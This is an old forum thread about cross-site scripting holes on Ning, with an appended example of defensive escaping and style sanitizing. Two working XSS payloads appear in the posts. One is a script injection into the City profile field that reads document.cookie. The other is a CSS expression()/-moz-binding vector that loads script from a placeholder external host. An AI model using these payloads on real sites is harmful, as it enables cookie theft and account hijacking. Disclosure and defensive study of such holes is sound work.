Ning XSS hole
Posted by: Delixe
Date: November 09, 2007 01:08AM

PoC -> http://opensocialdemo.ning.com/profile/Suhail

Image:


My Profile -> Account -> City

It's vulnerable in the City field with the vector "><script>alert(document.cookie);</script>

Ning is supposed to be closing it in the next round of patches I believe.



Edited 4 time(s). Last edit at 11/09/2007 01:31AM by Delixe.

Re: Ning XSS hole
Posted by: hackathology
Date: November 18, 2007 06:50AM

nice find

http://hackathology.blogspot.com

Re: Ning XSS hole
Posted by: DoctorDan
Date: December 09, 2007 02:34PM

That entire site is absolutely riddled with XSS holes. Any place that allows styled user input (blogs, comments, etc.) allows expression() and -moz-binding.
This vector is what I came up with for comments (Mozilla and IE)...
<a style="x:expression(document.body.firstChild.nextSibling.setAttribute('src','http://yoursite.com/XSS.js'));-moz-binding:url('http://yoursite.com/XSS.xml#xss')"></a>

-Dan



Edited 1 time(s). Last edit at 12/09/2007 02:34PM by DoctorDan.

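As an added defensive illustration (not code from this thread, from Ning, or from any poster): context-aware escaping for the City value from the first post, and an allowlist sanitizer for the styled comment input Dan describes, which drops expression() and -moz-binding without relying on a denylist. The field name, function names and the set of permitted CSS properties are assumptions.

```javascript
// Added example, not from the thread. Assumed setting: a profile page that
// echoes the "City" field into a double-quoted HTML attribute, and a comment
// renderer that keeps inline style attributes on user content.

// 1. Escaping for a value placed inside a double-quoted attribute. Once '"'
//    and '<' are encoded, the injected '">' can no longer close the attribute
//    and start a <script> tag. '&' is encoded first so later entities are
//    not double-encoded.
function escapeHtmlAttr(value) {
  return String(value)
    .replace(/&/g, '&amp;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#39;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;');
}

function renderCityField(city) {
  return '<input type="text" name="city" value="' + escapeHtmlAttr(city) + '">';
}

// 2. Allowlist sanitizer for inline CSS on user-styled content. Searching for
//    "expression(" or "-moz-binding" is a denylist that case, comment and
//    encoding variations slip past; instead only known-safe properties with
//    simple values survive and every other declaration is dropped.
const SAFE_STYLE_PROPS = new Set(['color', 'background-color', 'font-weight',
  'font-style', 'text-decoration', 'text-align']);
// Values limited to words, hex colours, percentages and plain numbers: no
// parentheses, so url(...) and expression(...) cannot appear at all.
const SAFE_STYLE_VALUE = /^[#\w\s%.,-]+$/;

function sanitizeStyle(styleAttr) {
  const kept = [];
  for (const decl of String(styleAttr).split(';')) {
    const idx = decl.indexOf(':');
    if (idx < 0) continue;                       // not a declaration
    const prop = decl.slice(0, idx).trim().toLowerCase();
    const value = decl.slice(idx + 1).trim();
    if (SAFE_STYLE_PROPS.has(prop) && SAFE_STYLE_VALUE.test(value)) {
      kept.push(prop + ': ' + value);
    }
  }
  return kept.join('; ');
}
```

Run against the two vectors quoted in this thread, renderCityField() yields an attribute containing no tag, and sanitizeStyle() returns an empty string, while ordinary colour and weight declarations pass through unchanged.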
Re: Ning XSS hole
Posted by: maluc
Date: December 22, 2007 07:40AM

A fun exercise in why partial censoring can be dangerous...

Spacing comparison can likely uncover more, but I haven't the patience for that ^^

New Image:


-maluc
